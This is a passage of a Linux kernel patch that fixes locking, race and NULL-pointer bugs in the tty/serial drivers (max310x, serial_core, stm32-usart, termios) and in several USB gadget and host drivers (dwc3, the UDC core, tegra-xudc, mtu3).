+--- a/drivers/tty/serial/max310x.c
++++ b/drivers/tty/serial/max310x.c
+@@ -525,6 +525,11 @@ static bool max310x_reg_precious(struct device *dev, unsigned int reg)
+ 	return false;
+ }
+ 
++static bool max310x_reg_noinc(struct device *dev, unsigned int reg)
++{
++	return reg == MAX310X_RHR_REG;
++}
++
+ static int max310x_set_baud(struct uart_port *port, int baud)
+ {
+ 	unsigned int mode = 0, div = 0, frac = 0, c = 0, F = 0;
+@@ -651,14 +656,14 @@ static void max310x_batch_write(struct uart_port *port, u8 *txbuf, unsigned int
+ {
+ 	struct max310x_one *one = to_max310x_port(port);
+ 
+-	regmap_raw_write(one->regmap, MAX310X_THR_REG, txbuf, len);
++	regmap_noinc_write(one->regmap, MAX310X_THR_REG, txbuf, len);
+ }
+ 
+ static void max310x_batch_read(struct uart_port *port, u8 *rxbuf, unsigned int len)
+ {
+ 	struct max310x_one *one = to_max310x_port(port);
+ 
+-	regmap_raw_read(one->regmap, MAX310X_RHR_REG, rxbuf, len);
++	regmap_noinc_read(one->regmap, MAX310X_RHR_REG, rxbuf, len);
+ }
+ 
+ static void max310x_handle_rx(struct uart_port *port, unsigned int rxlen)
+@@ -1469,6 +1474,10 @@ static struct regmap_config regcfg = {
+ 	.writeable_reg = max310x_reg_writeable,
+ 	.volatile_reg = max310x_reg_volatile,
+ 	.precious_reg = max310x_reg_precious,
++	.writeable_noinc_reg = max310x_reg_noinc,
++	.readable_noinc_reg = max310x_reg_noinc,
++	.max_raw_read = MAX310X_FIFO_SIZE,
++	.max_raw_write = MAX310X_FIFO_SIZE,
+ };
+ 
+ #ifdef CONFIG_SPI_MASTER
+@@ -1554,6 +1563,10 @@ static struct regmap_config regcfg_i2c = {
+ 	.volatile_reg = max310x_reg_volatile,
+ 	.precious_reg = max310x_reg_precious,
+ 	.max_register = MAX310X_I2C_REVID_EXTREG,
++	.writeable_noinc_reg = max310x_reg_noinc,
++	.readable_noinc_reg = max310x_reg_noinc,
++	.max_raw_read = MAX310X_FIFO_SIZE,
++	.max_raw_write = MAX310X_FIFO_SIZE,
+ };
+ 
+ static const struct max310x_if_cfg max310x_i2c_if_cfg = {
+diff --git a/drivers/tty/serial/serial_core.c b/drivers/tty/serial/serial_core.c
+index ec874f3a567ca..eea526d34fdda 100644
+--- a/drivers/tty/serial/serial_core.c
++++ b/drivers/tty/serial/serial_core.c
+@@ -1552,7 +1552,7 @@ uart_ioctl(struct tty_struct *tty, unsigned int cmd, unsigned long arg)
+ 		goto out;
+ 
+ 	/* rs485_config requires more locking than others */
+-	if (cmd == TIOCGRS485)
++	if (cmd == TIOCSRS485)
+ 		down_write(&tty->termios_rwsem);
+ 
+ 	mutex_lock(&port->mutex);
+@@ -1595,7 +1595,7 @@ uart_ioctl(struct tty_struct *tty, unsigned int cmd, unsigned long arg)
+ 	}
+ out_up:
+ 	mutex_unlock(&port->mutex);
+-	if (cmd == TIOCGRS485)
++	if (cmd == TIOCSRS485)
+ 		up_write(&tty->termios_rwsem);
+ out:
+ 	return ret;
+diff --git a/drivers/tty/serial/stm32-usart.c b/drivers/tty/serial/stm32-usart.c
+index 409e91d6829a5..81a53cc41dcb8 100644
+--- a/drivers/tty/serial/stm32-usart.c
++++ b/drivers/tty/serial/stm32-usart.c
+@@ -689,8 +689,9 @@ static void stm32_usart_transmit_chars(struct uart_port *port)
+ 	int ret;
+ 
+ 	if (!stm32_port->hw_flow_control &&
+-	    port->rs485.flags & SER_RS485_ENABLED) {
+-		stm32_port->txdone = false;
++	    port->rs485.flags & SER_RS485_ENABLED &&
++	    (port->x_char ||
++	     !(uart_circ_empty(xmit) || uart_tx_stopped(port)))) {
+ 		stm32_usart_tc_interrupt_disable(port);
+ 		stm32_usart_rs485_rts_enable(port);
+ 	}
+diff --git a/drivers/tty/tty.h b/drivers/tty/tty.h
+index f45cd683c02ea..1e0d80e98d263 100644
+--- a/drivers/tty/tty.h
++++ b/drivers/tty/tty.h
+@@ -62,6 +62,8 @@ int __tty_check_change(struct tty_struct *tty, int sig);
+ int tty_check_change(struct tty_struct *tty);
+ void __stop_tty(struct tty_struct *tty);
+ void __start_tty(struct tty_struct *tty);
++void tty_write_unlock(struct tty_struct *tty);
++int tty_write_lock(struct tty_struct *tty, int ndelay);
+ void tty_vhangup_session(struct tty_struct *tty);
+ void tty_open_proc_set_tty(struct file *filp, struct tty_struct *tty);
+ int tty_signal_session_leader(struct tty_struct *tty, int exit_session);
+diff --git a/drivers/tty/tty_io.c b/drivers/tty/tty_io.c
+index 36fb945fdad48..8e3de07f103da 100644
+--- a/drivers/tty/tty_io.c
++++ b/drivers/tty/tty_io.c
+@@ -933,13 +933,13 @@ static ssize_t tty_read(struct kiocb *iocb, struct iov_iter *to)
+ 	return i;
+ }
+ 
+-static void tty_write_unlock(struct tty_struct *tty)
++void tty_write_unlock(struct tty_struct *tty)
+ {
+ 	mutex_unlock(&tty->atomic_write_lock);
+ 	wake_up_interruptible_poll(&tty->write_wait, EPOLLOUT);
+ }
+ 
+-static int tty_write_lock(struct tty_struct *tty, int ndelay)
++int tty_write_lock(struct tty_struct *tty, int ndelay)
+ {
+ 	if (!mutex_trylock(&tty->atomic_write_lock)) {
+ 		if (ndelay)
+diff --git a/drivers/tty/tty_ioctl.c b/drivers/tty/tty_ioctl.c
+index ce511557b98b1..ad1cf51ecd11d 100644
+--- a/drivers/tty/tty_ioctl.c
++++ b/drivers/tty/tty_ioctl.c
+@@ -500,21 +500,42 @@ static int set_termios(struct tty_struct *tty, void __user *arg, int opt)
+ 	tmp_termios.c_ispeed = tty_termios_input_baud_rate(&tmp_termios);
+ 	tmp_termios.c_ospeed = tty_termios_baud_rate(&tmp_termios);
+ 
+-	ld = tty_ldisc_ref(tty);
++	if (opt & (TERMIOS_FLUSH|TERMIOS_WAIT)) {
++retry_write_wait:
++		retval = wait_event_interruptible(tty->write_wait, !tty_chars_in_buffer(tty));
++		if (retval < 0)
++			return retval;
+ 
+-	if (ld != NULL) {
+-		if ((opt & TERMIOS_FLUSH) && ld->ops->flush_buffer)
+-			ld->ops->flush_buffer(tty);
+-		tty_ldisc_deref(ld);
+-	}
++		if (tty_write_lock(tty, 0) < 0)
++			goto retry_write_wait;
+ 
+-	if (opt & TERMIOS_WAIT) {
+-		tty_wait_until_sent(tty, 0);
+-		if (signal_pending(current))
+-			return -ERESTARTSYS;
+-	}
++		/* Racing writer? */
++		if (tty_chars_in_buffer(tty)) {
++			tty_write_unlock(tty);
++			goto retry_write_wait;
++		}
+ 
+-	tty_set_termios(tty, &tmp_termios);
++		ld = tty_ldisc_ref(tty);
++		if (ld != NULL) {
++			if ((opt & TERMIOS_FLUSH) && ld->ops->flush_buffer)
++				ld->ops->flush_buffer(tty);
++			tty_ldisc_deref(ld);
++		}
++
++		if ((opt & TERMIOS_WAIT) && tty->ops->wait_until_sent) {
++			tty->ops->wait_until_sent(tty, 0);
++			if (signal_pending(current)) {
++				tty_write_unlock(tty);
++				return -ERESTARTSYS;
++			}
++		}
++
++		tty_set_termios(tty, &tmp_termios);
++
++		tty_write_unlock(tty);
++	} else {
++		tty_set_termios(tty, &tmp_termios);
++	}
+ 
+ 	/* FIXME: Arguably if tmp_termios == tty->termios AND the
+ 	   actual requested termios was not tmp_termios then we may
+diff --git a/drivers/usb/chipidea/core.c b/drivers/usb/chipidea/core.c
+index 281fc51720cea..25084ce7c297b 100644
+--- a/drivers/usb/chipidea/core.c
++++ b/drivers/usb/chipidea/core.c
+@@ -1108,7 +1108,7 @@ static int ci_hdrc_probe(struct platform_device *pdev)
+ 	ret = ci_usb_phy_init(ci);
+ 	if (ret) {
+ 		dev_err(dev, "unable to init phy: %d\n", ret);
+-		return ret;
++		goto ulpi_exit;
+ 	}
+ 
+ 	ci->hw_bank.phys = res->start;
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 476b636185116..9f8c988c25cb1 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -1883,13 +1883,11 @@ static int dwc3_probe(struct platform_device *pdev)
+ 	spin_lock_init(&dwc->lock);
+ 	mutex_init(&dwc->mutex);
+ 
++	pm_runtime_get_noresume(dev);
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_use_autosuspend(dev);
+ 	pm_runtime_set_autosuspend_delay(dev, DWC3_DEFAULT_AUTOSUSPEND_DELAY);
+ 	pm_runtime_enable(dev);
+-	ret = pm_runtime_get_sync(dev);
+-	if (ret < 0)
+-		goto err1;
+ 
+ 	pm_runtime_forbid(dev);
+ 
+@@ -1954,12 +1952,10 @@ err3:
+ 	dwc3_free_event_buffers(dwc);
+ 
+ err2:
+-	pm_runtime_allow(&pdev->dev);
+-
+-err1:
+-	pm_runtime_put_sync(&pdev->dev);
+-	pm_runtime_disable(&pdev->dev);
+-
++	pm_runtime_allow(dev);
++	pm_runtime_disable(dev);
++	pm_runtime_set_suspended(dev);
++	pm_runtime_put_noidle(dev);
+ disable_clks:
+ 	dwc3_clk_disable(dwc);
+ assert_reset:
+@@ -1983,6 +1979,7 @@ static int dwc3_remove(struct platform_device *pdev)
+ 	dwc3_core_exit(dwc);
+ 	dwc3_ulpi_exit(dwc);
+ 
++	pm_runtime_allow(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 	pm_runtime_set_suspended(&pdev->dev);
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index cf5b4f49c3ed8..3faac3244c7db 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2532,29 +2532,17 @@ static int __dwc3_gadget_start(struct dwc3 *dwc);
+ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ {
+ 	unsigned long flags;
++	int ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	dwc->connected = false;
+ 
+ 	/*
+-	 * Per databook, when we want to stop the gadget, if a control transfer
+-	 * is still in process, complete it and get the core into setup phase.
++	 * Attempt to end pending SETUP status phase, and not wait for the
++	 * function to do so.
+ 	 */
+-	if (dwc->ep0state != EP0_SETUP_PHASE) {
+-		int ret;
+-
+-		if (dwc->delayed_status)
+-			dwc3_ep0_send_delayed_status(dwc);
+-
+-		reinit_completion(&dwc->ep0_in_setup);
+-
+-		spin_unlock_irqrestore(&dwc->lock, flags);
+-		ret = wait_for_completion_timeout(&dwc->ep0_in_setup,
+-				msecs_to_jiffies(DWC3_PULL_UP_TIMEOUT));
+-		spin_lock_irqsave(&dwc->lock, flags);
+-		if (ret == 0)
+-			dev_warn(dwc->dev, "timed out waiting for SETUP phase\n");
+-	}
++	if (dwc->delayed_status)
++		dwc3_ep0_send_delayed_status(dwc);
+ 
+ 	/*
+ 	 * In the Synopsys DesignWare Cores USB3 Databook Rev. 3.30a
+@@ -2567,6 +2555,33 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	__dwc3_gadget_stop(dwc);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	/*
++	 * Per databook, when we want to stop the gadget, if a control transfer
++	 * is still in process, complete it and get the core into setup phase.
++	 * In case the host is unresponsive to a SETUP transaction, forcefully
++	 * stall the transfer, and move back to the SETUP phase, so that any
++	 * pending endxfers can be executed.
++	 */
++	if (dwc->ep0state != EP0_SETUP_PHASE) {
++		reinit_completion(&dwc->ep0_in_setup);
++
++		ret = wait_for_completion_timeout(&dwc->ep0_in_setup,
++				msecs_to_jiffies(DWC3_PULL_UP_TIMEOUT));
++		if (ret == 0) {
++			unsigned int    dir;
++
++			dev_warn(dwc->dev, "wait for SETUP phase timed out\n");
++			spin_lock_irqsave(&dwc->lock, flags);
++			dir = !!dwc->ep0_expect_in;
++			if (dwc->ep0state == EP0_DATA_PHASE)
++				dwc3_ep0_end_control_data(dwc, dwc->eps[dir]);
++			else
++				dwc3_ep0_end_control_data(dwc, dwc->eps[!dir]);
++			dwc3_ep0_stall_and_restart(dwc);
++			spin_unlock_irqrestore(&dwc->lock, flags);
++		}
++	}
++
+ 	/*
+ 	 * Note: if the GEVNTCOUNT indicates events in the event buffer, the
+ 	 * driver needs to acknowledge them before the controller can halt.
+@@ -4247,15 +4262,8 @@ static void dwc3_gadget_interrupt(struct dwc3 *dwc,
+ 		break;
+ 	case DWC3_DEVICE_EVENT_SUSPEND:
+ 		/* It changed to be suspend event for version 2.30a and above */
+-		if (!DWC3_VER_IS_PRIOR(DWC3, 230A)) {
+-			/*
+-			 * Ignore suspend event until the gadget enters into
+-			 * USB_STATE_CONFIGURED state.
+-			 */
+-			if (dwc->gadget->state >= USB_STATE_CONFIGURED)
+-				dwc3_gadget_suspend_interrupt(dwc,
+-						event->event_info);
+-		}
++		if (!DWC3_VER_IS_PRIOR(DWC3, 230A))
++			dwc3_gadget_suspend_interrupt(dwc, event->event_info);
+ 		break;
+ 	case DWC3_DEVICE_EVENT_SOF:
+ 	case DWC3_DEVICE_EVENT_ERRATIC_ERROR:
+diff --git a/drivers/usb/gadget/function/f_tcm.c b/drivers/usb/gadget/function/f_tcm.c
+index 658e2e21fdd0d..c21acebe8aae5 100644
+--- a/drivers/usb/gadget/function/f_tcm.c
++++ b/drivers/usb/gadget/function/f_tcm.c
+@@ -1054,7 +1054,7 @@ static void usbg_cmd_work(struct work_struct *work)
+ 				  tv_nexus->tvn_se_sess->se_tpg->se_tpg_tfo,
+ 				  tv_nexus->tvn_se_sess, cmd->data_len, DMA_NONE,
+ 				  cmd->prio_attr, cmd->sense_iu.sense,
+-				  cmd->unpacked_lun);
++				  cmd->unpacked_lun, NULL);
+ 		goto out;
+ 	}
+ 
+@@ -1183,7 +1183,7 @@ static void bot_cmd_work(struct work_struct *work)
+ 				  tv_nexus->tvn_se_sess->se_tpg->se_tpg_tfo,
+ 				  tv_nexus->tvn_se_sess, cmd->data_len, DMA_NONE,
+ 				  cmd->prio_attr, cmd->sense_iu.sense,
+-				  cmd->unpacked_lun);
++				  cmd->unpacked_lun, NULL);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index 23b0629a87743..b14cbd0a6d013 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -37,6 +37,10 @@ static struct bus_type gadget_bus_type;
+  * @vbus: for udcs who care about vbus status, this value is real vbus status;
+  * for udcs who do not care about vbus status, this value is always true
+  * @started: the UDC's started state. True if the UDC had started.
++ * @connect_lock: protects udc->vbus, udc->started, gadget->connect, gadget->deactivate related
++ * functions. usb_gadget_connect_locked, usb_gadget_disconnect_locked,
++ * usb_udc_connect_control_locked, usb_gadget_udc_start_locked, usb_gadget_udc_stop_locked are
++ * called with this lock held.
+  *
+  * This represents the internal data structure which is used by the UDC-class
+  * to hold information about udc driver and gadget together.
+@@ -48,6 +52,7 @@ struct usb_udc {
+ 	struct list_head		list;
+ 	bool				vbus;
+ 	bool				started;
++	struct mutex			connect_lock;
+ };
+ 
+ static struct class *udc_class;
+@@ -660,17 +665,9 @@ out:
+ }
+ EXPORT_SYMBOL_GPL(usb_gadget_vbus_disconnect);
+ 
+-/**
+- * usb_gadget_connect - software-controlled connect to USB host
+- * @gadget:the peripheral being connected
+- *
+- * Enables the D+ (or potentially D-) pullup.  The host will start
+- * enumerating this gadget when the pullup is active and a VBUS session
+- * is active (the link is powered).
+- *
+- * Returns zero on success, else negative errno.
+- */
+-int usb_gadget_connect(struct usb_gadget *gadget)
++/* Internal version of usb_gadget_connect needs to be called with connect_lock held. */
++static int usb_gadget_connect_locked(struct usb_gadget *gadget)
++	__must_hold(&gadget->udc->connect_lock)
+ {
+ 	int ret = 0;
+ 
+@@ -679,10 +676,15 @@ int usb_gadget_connect(struct usb_gadget *gadget)
+ 		goto out;
+ 	}
+ 
+-	if (gadget->deactivated) {
++	if (gadget->connected)
++		goto out;
++
++	if (gadget->deactivated || !gadget->udc->started) {
+ 		/*
+ 		 * If gadget is deactivated we only save new state.
+ 		 * Gadget will be connected automatically after activation.
++		 *
++		 * udc first needs to be started before gadget can be pulled up.
+ 		 */
+ 		gadget->connected = true;
+ 		goto out;
+@@ -697,22 +699,32 @@ out:
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL_GPL(usb_gadget_connect);
+ 
+ /**
+- * usb_gadget_disconnect - software-controlled disconnect from USB host
+- * @gadget:the peripheral being disconnected
+- *
+- * Disables the D+ (or potentially D-) pullup, which the host may see
+- * as a disconnect (when a VBUS session is active).  Not all systems
+- * support software pullup controls.
++ * usb_gadget_connect - software-controlled connect to USB host
++ * @gadget:the peripheral being connected
+  *
+- * Following a successful disconnect, invoke the ->disconnect() callback
+- * for the current gadget driver so that UDC drivers don't need to.
++ * Enables the D+ (or potentially D-) pullup.  The host will start
++ * enumerating this gadget when the pullup is active and a VBUS session
++ * is active (the link is powered).
+  *
+  * Returns zero on success, else negative errno.
+  */
+-int usb_gadget_disconnect(struct usb_gadget *gadget)
++int usb_gadget_connect(struct usb_gadget *gadget)
++{
++	int ret;
++
++	mutex_lock(&gadget->udc->connect_lock);
++	ret = usb_gadget_connect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(usb_gadget_connect);
++
++/* Internal version of usb_gadget_disconnect needs to be called with connect_lock held. */
++static int usb_gadget_disconnect_locked(struct usb_gadget *gadget)
++	__must_hold(&gadget->udc->connect_lock)
+ {
+ 	int ret = 0;
+ 
+@@ -724,10 +736,12 @@ int usb_gadget_disconnect(struct usb_gadget *gadget)
+ 	if (!gadget->connected)
+ 		goto out;
+ 
+-	if (gadget->deactivated) {
++	if (gadget->deactivated || !gadget->udc->started) {
+ 		/*
+ 		 * If gadget is deactivated we only save new state.
+ 		 * Gadget will stay disconnected after activation.
++		 *
++		 * udc should have been started before gadget being pulled down.
+ 		 */
+ 		gadget->connected = false;
+ 		goto out;
+@@ -747,6 +761,30 @@ out:
+ 
+ 	return ret;
+ }
++
++/**
++ * usb_gadget_disconnect - software-controlled disconnect from USB host
++ * @gadget:the peripheral being disconnected
++ *
++ * Disables the D+ (or potentially D-) pullup, which the host may see
++ * as a disconnect (when a VBUS session is active).  Not all systems
++ * support software pullup controls.
++ *
++ * Following a successful disconnect, invoke the ->disconnect() callback
++ * for the current gadget driver so that UDC drivers don't need to.
++ *
++ * Returns zero on success, else negative errno.
++ */
++int usb_gadget_disconnect(struct usb_gadget *gadget)
++{
++	int ret;
++
++	mutex_lock(&gadget->udc->connect_lock);
++	ret = usb_gadget_disconnect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
++
++	return ret;
++}
+ EXPORT_SYMBOL_GPL(usb_gadget_disconnect);
+ 
+ /**
+@@ -767,10 +805,11 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ 	if (gadget->deactivated)
+ 		goto out;
+ 
++	mutex_lock(&gadget->udc->connect_lock);
+ 	if (gadget->connected) {
+-		ret = usb_gadget_disconnect(gadget);
++		ret = usb_gadget_disconnect_locked(gadget);
+ 		if (ret)
+-			goto out;
++			goto unlock;
+ 
+ 		/*
+ 		 * If gadget was being connected before deactivation, we want
+@@ -780,6 +819,8 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ 	}
+ 	gadget->deactivated = true;
+ 
++unlock:
++	mutex_unlock(&gadget->udc->connect_lock);
+ out:
+ 	trace_usb_gadget_deactivate(gadget, ret);
+ 
+@@ -803,6 +844,7 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ 	if (!gadget->deactivated)
+ 		goto out;
+ 
++	mutex_lock(&gadget->udc->connect_lock);
+ 	gadget->deactivated = false;
+ 
+ 	/*
+@@ -810,7 +852,8 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ 	 * while it was being deactivated, we call usb_gadget_connect().
+ 	 */
+ 	if (gadget->connected)
+-		ret = usb_gadget_connect(gadget);
++		ret = usb_gadget_connect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
+ 
+ out:
+ 	trace_usb_gadget_activate(gadget, ret);
+@@ -1051,12 +1094,13 @@ EXPORT_SYMBOL_GPL(usb_gadget_set_state);
+ 
+ /* ------------------------------------------------------------------------- */
+ 
+-static void usb_udc_connect_control(struct usb_udc *udc)
++/* Acquire connect_lock before calling this function. */
++static void usb_udc_connect_control_locked(struct usb_udc *udc) __must_hold(&udc->connect_lock)
+ {
+-	if (udc->vbus)
+-		usb_gadget_connect(udc->gadget);
++	if (udc->vbus && udc->started)
++		usb_gadget_connect_locked(udc->gadget);
+ 	else
+-		usb_gadget_disconnect(udc->gadget);
++		usb_gadget_disconnect_locked(udc->gadget);
+ }
+ 
+ /**
+@@ -1072,10 +1116,12 @@ void usb_udc_vbus_handler(struct usb_gadget *gadget, bool status)
+ {
+ 	struct usb_udc *udc = gadget->udc;
+ 
++	mutex_lock(&udc->connect_lock);
+ 	if (udc) {
+ 		udc->vbus = status;
+-		usb_udc_connect_control(udc);
++		usb_udc_connect_control_locked(udc);
+ 	}
++	mutex_unlock(&udc->connect_lock);
+ }
+ EXPORT_SYMBOL_GPL(usb_udc_vbus_handler);
+ 
+@@ -1097,7 +1143,7 @@ void usb_gadget_udc_reset(struct usb_gadget *gadget,
+ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+ 
+ /**
+- * usb_gadget_udc_start - tells usb device controller to start up
++ * usb_gadget_udc_start_locked - tells usb device controller to start up
+  * @udc: The UDC to be started
+  *
+  * This call is issued by the UDC Class driver when it's about
+@@ -1108,8 +1154,11 @@ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+  * necessary to have it powered on.
+  *
+  * Returns zero on success, else negative errno.
++ *
++ * Caller should acquire connect_lock before invoking this function.
+  */
+-static inline int usb_gadget_udc_start(struct usb_udc *udc)
++static inline int usb_gadget_udc_start_locked(struct usb_udc *udc)
++	__must_hold(&udc->connect_lock)
+ {
+ 	int ret;
+ 
+@@ -1126,7 +1175,7 @@ static inline int usb_gadget_udc_start(struct usb_udc *udc)
+ }
+ 
+ /**
+- * usb_gadget_udc_stop - tells usb device controller we don't need it anymore
++ * usb_gadget_udc_stop_locked - tells usb device controller we don't need it anymore
+  * @udc: The UDC to be stopped
+  *
+  * This call is issued by the UDC Class driver after calling
+@@ -1135,8 +1184,11 @@ static inline int usb_gadget_udc_start(struct usb_udc *udc)
+  * The details are implementation specific, but it can go as
+  * far as powering off UDC completely and disable its data
+  * line pullups.
++ *
++ * Caller should acquire connect lock before invoking this function.
+  */
+-static inline void usb_gadget_udc_stop(struct usb_udc *udc)
++static inline void usb_gadget_udc_stop_locked(struct usb_udc *udc)
++	__must_hold(&udc->connect_lock)
+ {
+ 	if (!udc->started) {
+ 		dev_err(&udc->dev, "UDC had already stopped\n");
+@@ -1295,6 +1347,7 @@ int usb_add_gadget(struct usb_gadget *gadget)
+ 
+ 	udc->gadget = gadget;
+ 	gadget->udc = udc;
++	mutex_init(&udc->connect_lock);
+ 
+ 	udc->started = false;
+ 
+@@ -1496,11 +1549,15 @@ static int gadget_bind_driver(struct device *dev)
+ 	if (ret)
+ 		goto err_bind;
+ 
+-	ret = usb_gadget_udc_start(udc);
+-	if (ret)
++	mutex_lock(&udc->connect_lock);
++	ret = usb_gadget_udc_start_locked(udc);
++	if (ret) {
++		mutex_unlock(&udc->connect_lock);
+ 		goto err_start;
++	}
+ 	usb_gadget_enable_async_callbacks(udc);
+-	usb_udc_connect_control(udc);
++	usb_udc_connect_control_locked(udc);
++	mutex_unlock(&udc->connect_lock);
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 	return 0;
+@@ -1531,12 +1588,14 @@ static void gadget_unbind_driver(struct device *dev)
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 
+-	usb_gadget_disconnect(gadget);
++	mutex_lock(&udc->connect_lock);
++	usb_gadget_disconnect_locked(gadget);
+ 	usb_gadget_disable_async_callbacks(udc);
+ 	if (gadget->irq)
+ 		synchronize_irq(gadget->irq);
+ 	udc->driver->unbind(gadget);
+-	usb_gadget_udc_stop(udc);
++	usb_gadget_udc_stop_locked(udc);
++	mutex_unlock(&udc->connect_lock);
+ 
+ 	mutex_lock(&udc_lock);
+ 	driver->is_bound = false;
+@@ -1622,11 +1681,15 @@ static ssize_t soft_connect_store(struct device *dev,
+ 	}
+ 
+ 	if (sysfs_streq(buf, "connect")) {
+-		usb_gadget_udc_start(udc);
+-		usb_gadget_connect(udc->gadget);
++		mutex_lock(&udc->connect_lock);
++		usb_gadget_udc_start_locked(udc);
++		usb_gadget_connect_locked(udc->gadget);
++		mutex_unlock(&udc->connect_lock);
+ 	} else if (sysfs_streq(buf, "disconnect")) {
+-		usb_gadget_disconnect(udc->gadget);
+-		usb_gadget_udc_stop(udc);
++		mutex_lock(&udc->connect_lock);
++		usb_gadget_disconnect_locked(udc->gadget);
++		usb_gadget_udc_stop_locked(udc);
++		mutex_unlock(&udc->connect_lock);
+ 	} else {
+ 		dev_err(dev, "unsupported command '%s'\n", buf);
+ 		ret = -EINVAL;
+diff --git a/drivers/usb/gadget/udc/renesas_usb3.c b/drivers/usb/gadget/udc/renesas_usb3.c
+index 615ba0a6fbee1..32c9e369216c9 100644
+--- a/drivers/usb/gadget/udc/renesas_usb3.c
++++ b/drivers/usb/gadget/udc/renesas_usb3.c
+@@ -2596,6 +2596,7 @@ static int renesas_usb3_remove(struct platform_device *pdev)
+ 	debugfs_remove_recursive(usb3->dentry);
+ 	device_remove_file(&pdev->dev, &dev_attr_role);
+ 
++	cancel_work_sync(&usb3->role_work);
+ 	usb_role_switch_unregister(usb3->role_sw);
+ 
+ 	usb_del_gadget_udc(&usb3->gadget);
+diff --git a/drivers/usb/gadget/udc/tegra-xudc.c b/drivers/usb/gadget/udc/tegra-xudc.c
+index 76919d7570d23..3c7ffb35c35cd 100644
+--- a/drivers/usb/gadget/udc/tegra-xudc.c
++++ b/drivers/usb/gadget/udc/tegra-xudc.c
+@@ -2160,7 +2160,7 @@ static int tegra_xudc_gadget_vbus_draw(struct usb_gadget *gadget,
+ 
+ 	dev_dbg(xudc->dev, "%s: %u mA\n", __func__, m_a);
+ 
+-	if (xudc->curr_usbphy->chg_type == SDP_TYPE)
++	if (xudc->curr_usbphy && xudc->curr_usbphy->chg_type == SDP_TYPE)
+ 		ret = usb_phy_set_power(xudc->curr_usbphy, m_a);
+ 
+ 	return ret;
+diff --git a/drivers/usb/host/xhci-debugfs.c b/drivers/usb/host/xhci-debugfs.c
+index dc832ddf7033f..bd40caeeb21c6 100644
+--- a/drivers/usb/host/xhci-debugfs.c
++++ b/drivers/usb/host/xhci-debugfs.c
+@@ -133,6 +133,7 @@ static void xhci_debugfs_regset(struct xhci_hcd *xhci, u32 base,
+ 	regset->regs = regs;
+ 	regset->nregs = nregs;
+ 	regset->base = hcd->regs + base;
++	regset->dev = hcd->self.controller;
+ 
+ 	debugfs_create_regset32((const char *)rgs->name, 0444, parent, regset);
+ }
+diff --git a/drivers/usb/host/xhci-rcar.c b/drivers/usb/host/xhci-rcar.c
+index aef0258a7160d..98525704be9d4 100644
+--- a/drivers/usb/host/xhci-rcar.c
++++ b/drivers/usb/host/xhci-rcar.c
+@@ -75,7 +75,6 @@ MODULE_FIRMWARE(XHCI_RCAR_FIRMWARE_NAME_V3);
+ 
+ /* For soc_device_attribute */
+ #define RCAR_XHCI_FIRMWARE_V2   BIT(0) /* FIRMWARE V2 */
+-#define RCAR_XHCI_FIRMWARE_V3   BIT(1) /* FIRMWARE V3 */
+ 
+ static const struct soc_device_attribute rcar_quirks_match[]  = {
+ 	{
+@@ -147,8 +146,6 @@ static int xhci_rcar_download_firmware(struct usb_hcd *hcd)
+ 
+ 	if (quirks & RCAR_XHCI_FIRMWARE_V2)
+ 		firmware_name = XHCI_RCAR_FIRMWARE_NAME_V2;
+-	else if (quirks & RCAR_XHCI_FIRMWARE_V3)
+-		firmware_name = XHCI_RCAR_FIRMWARE_NAME_V3;
+ 	else
+ 		firmware_name = priv->firmware_name;
+ 
+diff --git a/drivers/usb/mtu3/mtu3_qmu.c b/drivers/usb/mtu3/mtu3_qmu.c
+index 2ea3157ddb6e2..e65586147965d 100644
+--- a/drivers/usb/mtu3/mtu3_qmu.c
++++ b/drivers/usb/mtu3/mtu3_qmu.c
+@@ -210,6 +210,7 @@ static struct qmu_gpd *advance_enq_gpd(struct mtu3_gpd_ring *ring)
+ 	return ring->enqueue;
+ }
+ 
++/* @dequeue may be NULL if ring is unallocated or freed */
+ static struct qmu_gpd *advance_deq_gpd(struct mtu3_gpd_ring *ring)
+ {
+ 	if (ring->dequeue < ring->end)
+@@ -484,7 +485,7 @@ static void qmu_done_tx(struct mtu3 *mtu, u8 epnum)
+ 	dev_dbg(mtu->dev, "%s EP%d, last=%p, current=%p, enq=%p\n",
+ 		__func__, epnum, gpd, gpd_current, ring->enqueue);
+ 
+-	while (gpd != gpd_current && !GET_GPD_HWO(gpd)) {
++	while (gpd && gpd != gpd_current && !GET_GPD_HWO(gpd)) {
+ 
+ 		mreq = next_request(mep);
+ 
+@@ -523,7 +524,7 @@ static void qmu_done_rx(struct mtu3 *mtu, u8 epnum)
+ 	dev_dbg(mtu->dev, "%s EP%d, last=%p, current=%p, enq=%p\n",
+ 		__func__, epnum, gpd, gpd_current, ring->enqueue);
+ 
+-	while (gpd != gpd_current && !GET_GPD_HWO(gpd)) {
++	while (gpd && gpd != gpd_current && !GET_GPD_HWO(gpd)) {
+ 
+ 		mreq = next_request(mep);
+ 
